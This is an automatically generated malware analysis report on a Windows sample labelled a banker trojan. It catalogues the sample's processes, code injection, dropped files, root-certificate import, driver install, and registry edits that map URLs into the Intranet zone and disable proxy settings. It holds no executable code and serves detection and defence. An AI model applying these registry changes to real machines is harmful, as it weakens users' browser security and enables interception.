Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR, BankerGeneric.YR (Lavasoft MAS)Behaviour: Banker, Trojan

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

MD5: ec805d4411149c36848938d5e82f6aff

SHA1: 3f1b64609c56d13c4298db68af23962e0e63141a

SHA256: f1905a74df4e6cf7485d0a23b1db6a206fa072fa350fa76865a7e5a6c037633c

SSDeep: 98304:whdN5ohSvG2TE6nrJ8NakTQVd5Oj8hIRTGFLsrmNq0stAQmFW:Y75oh65O5GVsrmNq0stAQmFW

Size: 4273912 bytes

File type: EXE

Platform: WIN32

Entropy: Not Packed

PEID: UPolyXv05_v6, BorlandDelphi30, BorlandDelphiv30, ACProtect141

Company: no certificate found

Created at: 1992-06-20 01:22:17

Analyzed on: WindowsXP SP3 32-bit

Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Dynamic Analysis

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

condefsetup (19).exe:1984
verclsid.exe:1272
cd.exe:1200
cd.exe:532
ASIns.exe:388

The Trojan injects its code into the following process(es):

%original file name%.exe:1012

Mutexes

The following mutexes were created/opened:

ZonesLockedCacheCounterMutexZonesCacheCounterMutexZonesCounterMutexRasPbFileShimCacheMutexMutexNPA_UnitVersioning_1012

File activity

The process condefsetup (19).exe:1984 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\mozcrt19.dll (7581 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nfregdrv.exe (1821 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\condefclean.exe (7716 bytes)
%Program Files%\Content Defender\nfregdrv.exe (601 bytes)
%Program Files%\Content Defender\nss\smime3.dll (601 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\certutil.exe (6324 bytes)
%Program Files%\Content Defender\ssleay32.dll (2105 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\smime3.dll (7716 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\wfp_windows7_i386.sys (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\softokn3.dll (4061 bytes)
%Program Files%\Content Defender\ContentDefenderPS.dll (13 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\certutil.exe (6324 bytes)
%Program Files%\Content Defender\libeay32.dll (9098 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\nspr4.dll (1821 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\ContentDefenderControl.exe (10588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\import_root_cert.exe (941 bytes)
%Program Files%\Content Defender\nss\plds4.dll (17 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\wfp_windows8_amd64.sys (58 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows7_i386.sys (3516 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\cd.exe (6341 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\plds4.dll (17 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\condefclean.exe (7716 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\import_root_cert.exe (6724 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\import_root_cert.exe (941 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\plds4.dll (17 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\ssleay32.dll (4061 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\ContentDefender.zip (37274 bytes)
%Program Files%\Content Defender\nss\softokn3.dll (2105 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\plds4.dll (580 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\softokn3.dll (25100 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\tdi__amd64.sys (61 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\softokn3.dll (25100 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\ContentDefenderPS.dll (6116 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\plc4.dll (20 bytes)
%System%\drivers\condef.sys (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\condefclean.exe (941 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\condefclean.exe (941 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss (4 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\tdi__i386.sys (4012 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\smime3.dll (7716 bytes)
%Program Files%\Content Defender\nss\mozcrt19.dll (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\ContentDefenderPS.dll (941 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\libeay32.dll (86270 bytes)
%Program Files%\Content Defender\nss\nspr4.dll (673 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\libeay32.dll (11493 bytes)
%Program Files%\Content Defender\import_root_cert.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\ContentDefenderControl.exe (1821 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows7_amd64.sys (4012 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\nspr4.dll (11620 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\ContentDefenderPS.dll (484 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nfregdrv.exe (9476 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\nspr4.dll (11620 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\plc4.dll (20 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows8_amd64.sys (4356 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nfregdrv.exe (9196 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\import_root_cert.exe (6724 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\mozcrt19.dll (7581 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\ContentDefenderControl.exe (1821 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\nss3.dll (24908 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\certutil.exe (941 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\cd.exe (41084 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\wfp_windows8_i386.sys (48 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\ssleay32.dll (26028 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\nss3.dll (4061 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\smime3.dll (941 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\plc4.dll (580 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\mozcrt19.dll (48748 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32 (4 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\cd.exe (34724 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\tdi__amd64.sys (4356 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\softokn3.dll (4061 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\certutil.exe (941 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\tdi__i386.sys (56 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\libeay32.dll (156321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\libeay32.dll (20400 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\plds4.dll (580 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\ssleay32.dll (32684 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\mozcrt19.dll (48748 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\ssleay32.dll (4861 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\smime3.dll (941 bytes)
%Program Files%\Content Defender\nss\certutil.exe (601 bytes)
%Program Files%\Content Defender\nss\plc4.dll (20 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\nss3.dll (24908 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\ContentDefenderPS.dll (13 bytes)
%Program Files%\Content Defender\ConDefSetup.exe (41656 bytes)
%Program Files%\Content Defender\condefclean.exe (601 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\ContentDefenderControl.exe (8836 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\cd.exe (5381 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Content Defender\Settings.lnk (804 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\wfp_windows7_amd64.sys (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\nspr4.dll (1821 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\nss3.dll (4061 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\plc4.dll (580 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nfregdrv.exe (1821 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows8_i386.sys (3516 bytes)
%Program Files%\Content Defender\nss\nss3.dll (2105 bytes)
%Program Files%\Content Defender\ContentDefenderControl.exe (673 bytes)
%Program Files%\Content Defender\cd.exe (3073 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\plds4.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nfregdrv.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\ContentDefenderPS.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\ssleay32.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\condefclean.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\nss3.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nfregdrv.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\ContentDefender.zip (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\certutil.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\mozcrt19.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\118[1] (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\smime3.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\plds4.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\softokn3.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows8_amd64.sys (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\certutil.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\ContentDefenderControl.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\import_root_cert.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\softokn3.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\ContentDefenderPS.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\nss3.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\nspr4.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\cd.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\ssleay32.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\smime3.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\condefclean.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\tdi__i386.sys (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows7_i386.sys (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\nspr4.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\plc4.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\libeay32.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\mozcrt19.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\plc4.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32 (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\tdi__amd64.sys (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows8_i386.sys (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64 (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\ContentDefenderControl.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\libeay32.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\cd.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows7_amd64.sys (0 bytes)

The process %original file name%.exe:1012 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

C:\libeay32.dll (6341 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\31F03376-17B9-4185-A6B6-3F7E5BFAF610\condefsetup (19).exe (39950 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\F2D6D111-7DB7-43BB-B86B-087C5EDE56A9\ASIns.exe (3667 bytes)
C:\ssleay32.dll (1821 bytes)

The process cd.exe:532 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Program Files%\Content Defender\cert\SSL\ContentDefender 2.cer (774 bytes)
%Program Files%\Content Defender\cert\SSL\cert.db (2 bytes)

The process ASIns.exe:388 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsl5.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk4.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu3.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp (20699 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\check[1].exe (12984 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb6.tmp (12984 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsq1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl5.tmp (0 bytes)

Registry activity

The process condefsetup (19).exe:1984 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ContentDefender]
"EstimatedSize" = "6000"
"Publisher" = "Artex Management S. A."

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ContentDefender]
"InstallDate" = "20141218"

"DisplayVersion" = "1.80"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\BagMRU]
"MRUListEx" = "00 00 00 00 01 00 00 00 03 00 00 00 02 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\ContentDefender]
"CampaignID" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\System\CurrentControlSet\Services\condef]
"Tag" = "8"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ContentDefender]
"DisplayIcon" = "%Program Files%\Content Defender\ConDefSetup.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ContentDefender]
"DisplayName" = "Content Defender"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\BagMRU\0]
"MRUListEx" = "02 00 00 00 00 00 00 00 01 00 00 00 FF FF FF FF"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\SOFTWARE\ContentDefender]
"SourceId" = "106"
"ff" = "yes"

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "08 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ContentDefender]
"UninstallString" = "%Program Files%\Content Defender\ConDefSetup.exe uninst=1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 28 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\BagMRU]
"NodeSlots" = "02 02 02 02 02 02 02 02 02 02 02"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "31 51 8E B7 0B 8A A5 3D 8B 6D 19 08 03 88 4C C8"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached]
"{E88DCCE0-B7B3-11D1-A9F0-00AA0060FA31} {000214E6-0000-0000-C000-000000000046} 0x401" = "01 00 00 00 7C 6C 9C 7C 08 75 54 15 30 39 D1 01"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\ContentDefender]
"SiteID" = "200075929"
"UserId" = "549FB71C-C58B-4B41-A495-C14234748C4C"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:1012 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\ec805d4411149c36848938d5e82f6aff\DEBUG]
"Trace Level" = ""

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\31F03376-17B9-4185-A6B6-3F7E5BFAF610]
"condefsetup (19).exe" = "Content Defender Setup"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\F2D6D111-7DB7-43BB-B86B-087C5EDE56A9]
"ASIns.exe" = "ASIns"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CB 2D BF F0 FB 51 5B 5F 60 03 F4 5C 10 11 D9 76"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

